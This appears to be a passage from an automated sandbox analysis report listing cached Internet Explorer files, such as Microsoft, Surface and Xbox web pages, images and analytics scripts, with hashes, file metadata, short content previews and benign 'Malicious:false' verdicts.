                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):67842
                                                                                                                                                                                                              Entropy (8bit):5.429213907170521
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:tHmIR+J9Zm4nzKF5ZHwKhoLGYhz3jEj9TNfHx7EmI9oNoVBbX:tlRMLUfYfv
                                                                                                                                                                                                              MD5:D593D2B5988D176F341B0FB727319282
                                                                                                                                                                                                              SHA1:59B28286F74520F556CE1845F33DEC7A7D4C7011
                                                                                                                                                                                                              SHA-256:527ABA7B7E02ECA09D6B27F02156D34597863E3F76F5177CAD93B8BAE6FC86DA
                                                                                                                                                                                                              SHA-512:2321C7C2D2BE32F548D067FE5EFC9876395D62512FFD115E0C086B40E1274A9871AF89C3E2F349F884C500A0F0C850BF12F6C54C13E9ADACAED8BAFB3EFBA692
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ......<!DOCTYPE html>..<html lang="en-us" dir="ltr">..<head data-info="{&quot;v&quot;:&quot;1.0.7797.2686&quot;,&quot;a&quot;:&quot;d33ce2b8-6ec7-4cfc-9d54-22291584da5d&quot;,&quot;cn&quot;:&quot;OneDeployContainer&quot;,&quot;az&quot;:&quot;{did:92e7dc58ca2143cfb2c818b047cc5cd1, rid: OneDeployContainer, sn: marketingsites-prod-odnortheurope, dt: 2018-05-03T20:14:23.4188992Z, bt: 2021-05-07T09:29:32.0000000Z}&quot;,&quot;ddpi&quot;:&quot;1&quot;,&quot;dpio&quot;:&quot;&quot;,&quot;dpi&quot;:&quot;1&quot;,&quot;dg&quot;:&quot;uplevel.web&quot;,&quot;th&quot;:&quot;default&quot;,&quot;m&quot;:&quot;en-us&quot;,&quot;l&quot;:&quot;en-us&quot;,&quot;mu&quot;:&quot;en-us&quot;,&quot;rp&quot;:&quot;/en-us/videoplayer/embed/RWBtR2&quot;,&quot;f&quot;:null,&quot;bh&quot;:{}}">.. <meta charset="UTF-8" />.... <meta http-equiv="x-ua-compatible" content="ie=edge" />.. <meta name="viewport" content="width=device-width, initial-scale=1" />.. <title></title>.. ..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RWBtR2[2].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):67840
                                                                                                                                                                                                              Entropy (8bit):5.429453778401893
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:wHmIRtJ9Zm4nzKF5ZHwKhoLGYhz3jEj9TNfHx7EmI9oNPhBbX:wlRhLUfYUr
                                                                                                                                                                                                              MD5:56C30389D18F331DD00CFC73DF715DE6
                                                                                                                                                                                                              SHA1:131225B94BDC9BA62AE1FED91DAEF9F1390EA9C7
                                                                                                                                                                                                              SHA-256:F00C74076E4C292801E38B6915C375E712D75E43632B95C02D0CCC9199A9D5A3
                                                                                                                                                                                                              SHA-512:BC7121A195CE4ED0ABABA24E72A60B6CE3108F910ED8772FFD4494D5602D0F1807211C2425C1207A8562A561520E473CDB1BEACD6AEFFE7F5BD5ECF2DD0475E8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/en-us/videoplayer/embed/RWBtR2?pid=player-container1-oneplayer&jsapi=true&postJsllMsg=true&autoplay=false&mute=false&loop=false&market=en-us&useAdaptive=false&playFullScreen=false
                                                                                                                                                                                                              Preview: ......<!DOCTYPE html>..<html lang="en-us" dir="ltr">..<head data-info="{&quot;v&quot;:&quot;1.0.7797.2686&quot;,&quot;a&quot;:&quot;4183a311-b87c-4a48-81a6-c50e2e53e504&quot;,&quot;cn&quot;:&quot;OneDeployContainer&quot;,&quot;az&quot;:&quot;{did:92e7dc58ca2143cfb2c818b047cc5cd1, rid: OneDeployContainer, sn: marketingsites-prod-odnortheurope, dt: 2018-05-03T20:14:23.4188992Z, bt: 2021-05-07T09:29:32.0000000Z}&quot;,&quot;ddpi&quot;:&quot;1&quot;,&quot;dpio&quot;:&quot;&quot;,&quot;dpi&quot;:&quot;1&quot;,&quot;dg&quot;:&quot;uplevel.web&quot;,&quot;th&quot;:&quot;default&quot;,&quot;m&quot;:&quot;en-us&quot;,&quot;l&quot;:&quot;en-us&quot;,&quot;mu&quot;:&quot;en-us&quot;,&quot;rp&quot;:&quot;/en-us/videoplayer/embed/RWBtR2&quot;,&quot;f&quot;:null,&quot;bh&quot;:{}}">.. <meta charset="UTF-8" />.... <meta http-equiv="x-ua-compatible" content="ie=edge" />.. <meta name="viewport" content="width=device-width, initial-scale=1" />.. <title></title>.. ..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RWlwWB[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 40 x 40, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):287
                                                                                                                                                                                                              Entropy (8bit):6.819492179126164
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhPnMtkLnl4xWKx2MjYC0N3p7RtGMJXrP578kAUi8J5dp:6v/7Pj943u/iIlAyFJ5z
                                                                                                                                                                                                              MD5:ED232E052B7CAFA5C407A466039D6AFF
                                                                                                                                                                                                              SHA1:1322B59C89F96B8A7B50EE2E44A72D0570297499
                                                                                                                                                                                                              SHA-256:D8C20074941FB1B3973CC0088C007FFD7A65946DD12504036E32B37E793A5FD1
                                                                                                                                                                                                              SHA-512:1B9BFCD3C5A10D6F02B475CA6A06415E6DB143C79E28F5DCFC73001ED12CD1244CB4F9007F9F1695D355FB540FF5952E0EA82EA024E5C0F00D547E99C13E0AA1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWlwWB?ver=161c&q=90&m=6&h=40&w=40&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...(...(.....&.p.....orNT..w.....IDATH..K..0.D..@..@0.B..2..A..C0.C0....g.N..:c.Q.'.N.?....W\}..j@K,..L....x...y.M...I.l.).{...5#>]...~......U.Ld.S..|......e.......*.\....l..l..l....x.C.....U.R.....L#D.q\.j@=.....q.}..|...[N....R.^*0...La..?....n+.B}....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RWxJTg[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 279x157, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):14513
                                                                                                                                                                                                              Entropy (8bit):7.962010111787048
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:NWrpZGhnzwDUAwddyhg1UwVdsg60C/fMaMkHQps:NIKz8UlyeRsgpOrHwW
                                                                                                                                                                                                              MD5:37BB8945A2DC5AAE0F460F37DA9836A1
                                                                                                                                                                                                              SHA1:8B5398C8472E16066909370176DAA98544DCB864
                                                                                                                                                                                                              SHA-256:7B5AB0D4504E7DE45D129C30FD01E7FC153EB8B886E7A22E5CC5307E736F3FB3
                                                                                                                                                                                                              SHA-512:C96559CE0AA8851BFB490965A53CCCB899A27DD8CF4B47717271B6CDD6E07A60515B72F0D7638D9959853F73C6C691F995E74B23CC3D8EF76A7E3402214D593C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWxJTg?ver=3373&q=90&m=6&h=157&w=279&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%....................................................................%%2..............................................................%%2..........."...........................................................X.'.G..w7K+.Q.&.....5....bg..O.....M...J.P]..4.t.=......c....{L.[8..n.k~._..R...nq.%.z....|....1)3oF}CD...J.W'.xf..'?..(.....T..C.wp....p.0....}f)...<.."Y...V.@...k#...U...B)...Z._.MU.Bp.p.M...K....!....n)....f'..+....N.!M.D.s.w.@...<..Hs.c=..{(.....ooK`.*..D(E...._.;0.h)$#..R.D.p.m.}..3'.o..L...H.)...-..-{.y.%..oj..$...q0g=*:..;.D....!N2.s.h.C....)....E>m.0Cq.M|...t...Zw..VN..j.(HT.k..Of.k..SNy.3|.L..%...UR.);,.'pN...=<..e..^y..........:....|k...).........k.#...M$.5tsP.*....t..I9/.i.)H...u.H...!-n..j..E\.C...mS.m2c..Oh}..sO.dPy..U.Z..\.aSy..b..].t..&K+.....&S..~..n.2....t...p.!T.>[T.(...O.K(..m.f.f..V.(k.v....F_.......s0..Gc.g._..p.k..7/t...MQ.5.\y.j..I./K.....24X.;NoP..j............................................$..H.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\SurfaceHome_Lg_LinkNav_Panel_2_image2[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):2700
                                                                                                                                                                                                              Entropy (8bit):4.0512327807053135
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Vrm52wylgV/NtnyzXzGb5ZGkOnYJR/Kn/ARttPMntx5fe5UP6:dr5o/XnyzXzGb5ZGkOnYJM/Ajt27B6
                                                                                                                                                                                                              MD5:AB93076893C8F78FCFF45E52EDEFF382
                                                                                                                                                                                                              SHA1:E7792E494227FB92724EF33EFAC24A102FB3F3BD
                                                                                                                                                                                                              SHA-256:B9AFCDFFE50AAE8D924F007A8CA6C2CF5F42C4B9C55FBA8AB274D26FD2CC7E0C
                                                                                                                                                                                                              SHA-512:93D5418572990F455297AA5CC27FDBDEFA544C4FD2882F4A772D513047ED229285071BBA39ABDC2CAD5D4625D0E89FC66AD72812B7534F9940659FB22177A375
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/SurfaceHome_Lg_LinkNav_Panel_2_image2.svg?version=da456df5-7733-1a20-6668-991b453cd479
                                                                                                                                                                                                              Preview: <svg enable-background="new 0 0 27 21" viewBox="0 0 27 21" xmlns="http://www.w3.org/2000/svg"><switch><foreignObject height="1" requiredExtensions="http://ns.adobe.com/AdobeIllustrator/10.0/" width="1"/><path d="m22.844 6c.3 0 .58.059.843.176.261.117.49.278.684.48.196.203.349.442.461.715.113.274.168.567.168.879v6.82c0 .969-.188 1.822-.568 2.561-.378.738-.878 1.358-1.505 1.857-.625.5-1.337.877-2.138 1.131-.802.254-1.625.381-2.47.381-.704 0-1.317-.043-1.838-.129-.519-.086-.982-.211-1.386-.375s-.768-.369-1.088-.615c-.323-.246-.645-.531-.966-.855-.323-.324-.658-.683-1.007-1.078-.347-.394-.745-.826-1.195-1.295-.241-.25-.484-.5-.731-.75s-.49-.504-.729-.762c-.525.25-1.045.5-1.562.75s-1.033.5-1.549.75l-1.292-2.918c-.494.516-.99 1.025-1.488 1.529s-.994 1.014-1.488 1.529v-16.652l10.062 10.5v-8.379c0-.312.057-.605.169-.879.112-.273.265-.511.459-.715.196-.203.423-.363.686-.48.263-.117.544-.176.843-.176.421 0 .766.075 1.039.223.274.149.49.344.651.586s.276.524.343.844c.067.321.11.653.129.996.018.344
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Surface_Home_HMC_HighlightFeature_Spring_21_V1[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:[TIFF image data, little-endian, direntries=0], baseline, precision 8, 1920x720, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):101119
                                                                                                                                                                                                              Entropy (8bit):7.288488281826517
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:BXk+j0dXdFalFSUe1RR8zlK/OJuQwbfz2/ySGmvXW1ewJk/rjkAbrf5jSRhDM9/i:BXviXWe98cpJC/y2Se0k/EA32hDt
                                                                                                                                                                                                              MD5:FA77084E64AF11C74A68CF4B84679FEE
                                                                                                                                                                                                              SHA1:EC512C03E1BA977D751CC27C4C27F4D2A93ECB19
                                                                                                                                                                                                              SHA-256:BF8CB95D39A5B278D5ADB16191876A24D0CCB618BD6A9D00ACB687806699F9B9
                                                                                                                                                                                                              SHA-512:BAD344850533E823F6B4520CB56237DA307F4D4B1CFF7BCA89AD63ED1AE749FD4642F4F73E7DAF741ACBA401C686AB0A128F7D7ED91252FCD549CC9A728EC2D5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Surface_Home_HMC_HighlightFeature_Spring_21_V1.jpg?version=03ed24a9-1ad2-b0e4-effb-c43b598c1d54
                                                                                                                                                                                                              Preview: ......Exif..II*.................Ducky.......K......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:16C0076A85F911EB9AD38DD4886F9E49" xmpMM:InstanceID="xmp.iid:16C0076985F911EB9AD38DD4886F9E49" xmp:CreatorTool="Adobe Photoshop 2021 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="D1A0B248B22ACA2B39FC9616411AFBA1" stRef:documentID="D1A0B248B22ACA2B39FC9616411AFBA1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Surface_Home_Hero_Spring_21_color_V2[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x720, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):90291
                                                                                                                                                                                                              Entropy (8bit):7.8974920099993415
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:8Nl1BLC7px1ZsC9vC/LCLUMYLop2gEMgKlDnafFKhTjZGHbqrJ4RstXF8m11LQyZ:8NlmfvsGv0UUFcUhMhlDaFKhTjQWr6Ap
                                                                                                                                                                                                              MD5:49F61229D41A16BC4CB3207BDAFF459B
                                                                                                                                                                                                              SHA1:EEB2AE255DB97C20CD0CC7876E456B7A45D3E86F
                                                                                                                                                                                                              SHA-256:6B1B23D66D6842FAE03A6E21C159CEF8F054FB7925D316B222397E5D175420F4
                                                                                                                                                                                                              SHA-512:DE2E95AAF8A83749F75FE427B88934AF27FCD14F8D7822520AE317719D626D2D2DEFD0A4C628611937CFA25BCBBE8E9183060211FE4AF24392C5340FF8FDAE1F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Surface_Home_Hero_Spring_21_color_V2.jpg?version=ef276840-bd01-e7b2-6a39-25ac16b841b1
                                                                                                                                                                                                              Preview: ......JFIF..............................................................................................................................................................................................................@.I$...IU$..$.*.5.C ...U.4h.&.&..D.H.H$P .A .A .I..@.H4I$.UU.a.UU.2.uYq.WF..K.%.%.wwwwwwww....r....ws...I .I*..Q.CR.CUU..UF.5T!4h.M.I$.I$.I... .. .H .A$.D.h.h.P...!.Cp.....2.IrK..K..........E......w.wrI$.d.C$.Q.CP.F.P.5Th.F."...h...$Q....H$.A .A .H$.E..4.......UUUT.|.S...IteUT..\..].....)w.)w.)w..\.....$.CRI!.I.I(.d..J.h.Q.h.h.$.I$... .. .A .A .H$.@.I.I$.a.*...UUU\...C.Eur..D.%.r....]....w......r....I.I$..I..Q.R....CUF...4h.$.@.h...I..A.....A..A..9....I...*....UW98..{4MH...G..}.T.r].......qIwr....r.)..$.HjI%T.J2HjUHj...j....&..@.$.I.(P ....$.H .H$.. .I$. .UQ.TeUUJ....;..&..5...o....@MT....].....\..w....r..^.I(.$.I$.$....2..j.......&.&..h.A$.H ....I..A..H$.I$...5(.2.T..~.G..$..?..5........`.j].Wwww..R.]......]....$...I..HjI..J0...U....&..I4I$.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Surface_Lg_Generic_ContentPlacement_3UP_20_Business_V1[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:[TIFF image data, little-endian, direntries=0], baseline, precision 8, 485x272, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):41566
                                                                                                                                                                                                              Entropy (8bit):7.970894420395129
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:NlU3wgCeWy4Z3TUYX6jXN1NXzXoYauAGNcNtnLTn0U0S1qUPgIIIEg:Nl4wgC/y4ZxXaFzFauHN4RvnH0fVg
                                                                                                                                                                                                              MD5:60890C74D58E525DDDA8DB3EB2486C94
                                                                                                                                                                                                              SHA1:88285C36DC67349F4CD1460EABA9F565D9B7E575
                                                                                                                                                                                                              SHA-256:6BA51FEA14178DCF16DD545430BCB66C9AC889C4C670EB4D5F9F09C57A0F373D
                                                                                                                                                                                                              SHA-512:9CB5E7F4F920AA0C4DF6BE1646ECE722462C7F3A18BB736EDFD00BB9E135C5424E983D77111920FA8433CA3C6F3339DE50EE5E0EA930B3B16B7E3812EC6618A4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Surface_Lg_Generic_ContentPlacement_3UP_20_Business_V1.jpg?version=89c8b139-8e32-4d1f-6dd9-09b13aeb5afe
                                                                                                                                                                                                              Preview: ......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:7E6E3AA4917511EA96B8F13B1A010E1A" xmpMM:InstanceID="xmp.iid:12627EF0916C11EA96B8F13B1A010E1A" xmp:CreatorTool="Adobe Photoshop 2020 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="A3345D466467131E4C37D35A8DE426A4" stRef:documentID="A3345D466467131E4C37D35A8DE426A4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\TelemetryLogging[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1352
                                                                                                                                                                                                              Entropy (8bit):4.872231653913572
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:yKGUNphlp9hwCfldX5w2S5IkL60mwqpkL/prw/L/twBt852zp2TZ0TzY+Yzh0:yKGUjh79hw09wT5IC6XChUSt85292TZw
                                                                                                                                                                                                              MD5:094E9F6E4CA96BD9F40ED307707CFB97
                                                                                                                                                                                                              SHA1:9416F5CDB75486CC19D3438A81AB8549D01DF373
                                                                                                                                                                                                              SHA-256:7F8BC8B4E7D9E574828C4671D6D80468BCACAF587B966B0E19A05AA4F35D1D2A
                                                                                                                                                                                                              SHA-512:B97310A1F1BFE13A74853520E11545CB163763F6B4694E09898D29D2A32415DBD7EB4C32AA9F89C4C0475247B9993A945D4E7DB935E21AD9F3CAF03576AB84DF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/js/TelemetryLogging.js?v=f4vItOfZ5XSCjEZx1tgEaLysr1h7lmsOGaBapPNdHSo
                                                                                                                                                                                                              Preview: /*! Copyright (C) Microsoft. All rights reserved. */....window.TelemetryLogging = (function () {...var events = {....'captureContentPageAction': 'captureContentPageAction',....'capturePageAction': 'capturePageAction',....'captureContentUpdate': 'captureContentUpdate'...};.....function sendEvent(event, overrideTags, element, customProperties) {....if (typeof window.awa === 'object') {.....if (typeof element === 'undefined') {......element = null;.....}.......if (event === events.capturePageAction) {......window.awa.ct.capturePageAction(element, overrideTags);.....}.....else if (event === events.captureContentPageAction) {......window.awa.ct.captureContentPageAction(overrideTags);.....}.....else if (event) {......window.awa.ct.captureContentUpdate(overrideTags);.....}....}......if (typeof window.analytics === 'object') {.....if (typeof element === 'undefined') {......element = null;.....}.......if (typeof customProperties === 'undefined') {......customProperties = null;.....}.......if (e
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\WR1113b[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):116869
                                                                                                                                                                                                              Entropy (8bit):5.5970798903305035
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:7OCt4xtLWBXcddiRDidqQPgskZZ4aiBmYzARZxbYlPlUWWC:mLWBKP833amWFWC
                                                                                                                                                                                                              MD5:5BCDA786978A3E09D4059EBEE7B05882
                                                                                                                                                                                                              SHA1:53DD4BFB0A12AFC1F6EE7B22B4D15583CA672036
                                                                                                                                                                                                              SHA-256:16A4B9B119F8EC2D98E854591786A83966B01B4583F255536B63449B992598D3
                                                                                                                                                                                                              SHA-512:7DE6F1DB9A3B90E8464A1D2289076FD676153F3AA5C8EEE477C29C7E0A7CA024FA239B969CD293EF0918DE7B7A852AA5D80C7FE85E79886596815F44AA25740E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://cdnssl.clicktale.net/www/WR1113b.js
                                                                                                                                                                                                              Preview: /*! Copyright 2006-2020 ClickTale Ltd. */.!function(){!function(){var ez=!0,ey=null,ex=!1;function ew(ea){return function(){return ea}}var ev;var eu;function et(){if(eu){return eu}var ea=window.ClickTaleGlobal;ea||(ea={},window.ClickTaleGlobal=ea);ea.exports=ea.exports||{};ea.symbols=ea.symbols||{};ea.api=ea.api||{};return eu=ea}var es;function d6(){if(!es){var ea=et();ea.exports.queueing=ea.exports.queueing||{};es=ea.exports.queueing}return es}function er(eB,ea){this.f=ez;this.d=[];this.h=eB;this.a=ea;this.a.setContext(this)}ev=er.prototype;ev.z=function(ea){this.l(ea,this.d.length)};ev.l=function(eB,ea){this.f&&(this.d.splice(ea,0,eB),this.i())};ev.A=function(ea){this.l(ea,0)};ev.o=function(){return this.d[0]};ev.i=function(){var ea=this.o();if(ea){if(this.h.process(ea)&&(this.d=this.d.splice(1),!this.n())){return ea}this.a.defer(this.i)}return ey};ev.n=function(){return 0<this.d.length};ev.flush=function(eB){var ea,eB=eB||ew(ez);this.f=ex;for(this.a.destroy();ea=this.o();){eB(ea)&&t
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\adobeaudiencemanager[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):191949
                                                                                                                                                                                                              Entropy (8bit):5.346177652428473
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:Z+9C5kvGy8VkwlGV/gECbYUQFw969d1kJcdKeaYDW1PWCgGDbn5lHij6D4/55p2K:+Gy8/Y8M9w8KbuCPIJkSv
                                                                                                                                                                                                              MD5:1EA9200D840D6DC717E9E59A1152D8F2
                                                                                                                                                                                                              SHA1:2D1AB70E2F60F24390C5E0335BA339A4EC22A511
                                                                                                                                                                                                              SHA-256:0609BE07A5A840529E8B065D717BA2D4E59B3AC183C242C6E3DD385E13BC478F
                                                                                                                                                                                                              SHA-512:C409DD727DF247B5EBCFFA00C07ADB038A9BD2A7D5530EE1011DEA0F5C957E71F098C0470A8B304F660EC04332DFFED2BF8E5C02A8A628239D878D375EEA5F5E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.xbox.com/xbcservicewebwww-2104-29112-0-0-main-rolling/shell/js/adobeaudiencemanager.js
                                                                                                                                                                                                              Preview: /**.. * @author Gaming Tagging & Analytics Team.. * @since 09-06-2019.. * @compilation_version 1.8.. * - AAM library script v 4.4.0, sets up Visitor object, does ID Syncs.. * - AT v2.4.0.. * - DIL 8.1.. * - Integration of AAM with AT.. * - Using target CNAME.. * - Integration of AT and JSLL.. * - Integration of DIL and AAM.. */..../* SET TARGET PROPERTY HERE */..window.at_property = "06e68c86-4fe8-d456-fcf9-348c5b0c4132"; /* XBOX Web */....// MSFT VisitorAPI js **********************************************../**.. * @license.. * Adobe Visitor API for JavaScript version: 4.4.0.. * Copyright 2019 Adobe, Inc. All Rights Reserved.. * More info available at https://marketing.adobe.com/resources/help/en_US/mcvid/.. */..var e=function(){"use strict";function e(t){return(e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(t)}function t(e,t,
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\allContent2[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):568175
                                                                                                                                                                                                              Entropy (8bit):5.272901633105067
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:O4wGEJXUQlBT2iFUcX9ZzEJXUQdgT2uLc2+9i/EJXUQdgT2GLc28Q2iiJ8IQl6T1:AS
                                                                                                                                                                                                              MD5:ED3A030F8FD7899350CF1B56B4E0B258
                                                                                                                                                                                                              SHA1:E274700042CBCC7FD106F626884EECB4BA9603C0
                                                                                                                                                                                                              SHA-256:C210B56A8635DD0A49EE3F4E00B316AB2F8DA965BD6F7B68857D1C7E03FED238
                                                                                                                                                                                                              SHA-512:71327F10A2A9E54078F2A9E3E454321E2F08BB8A55DB50E434C62087D73341D068305D6F4715B07EF13A9976A1E4C8B5320D4DCC08517F7F9155AC0F40EE5426
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.xbox.com/en-US/home/js/allContent2.js
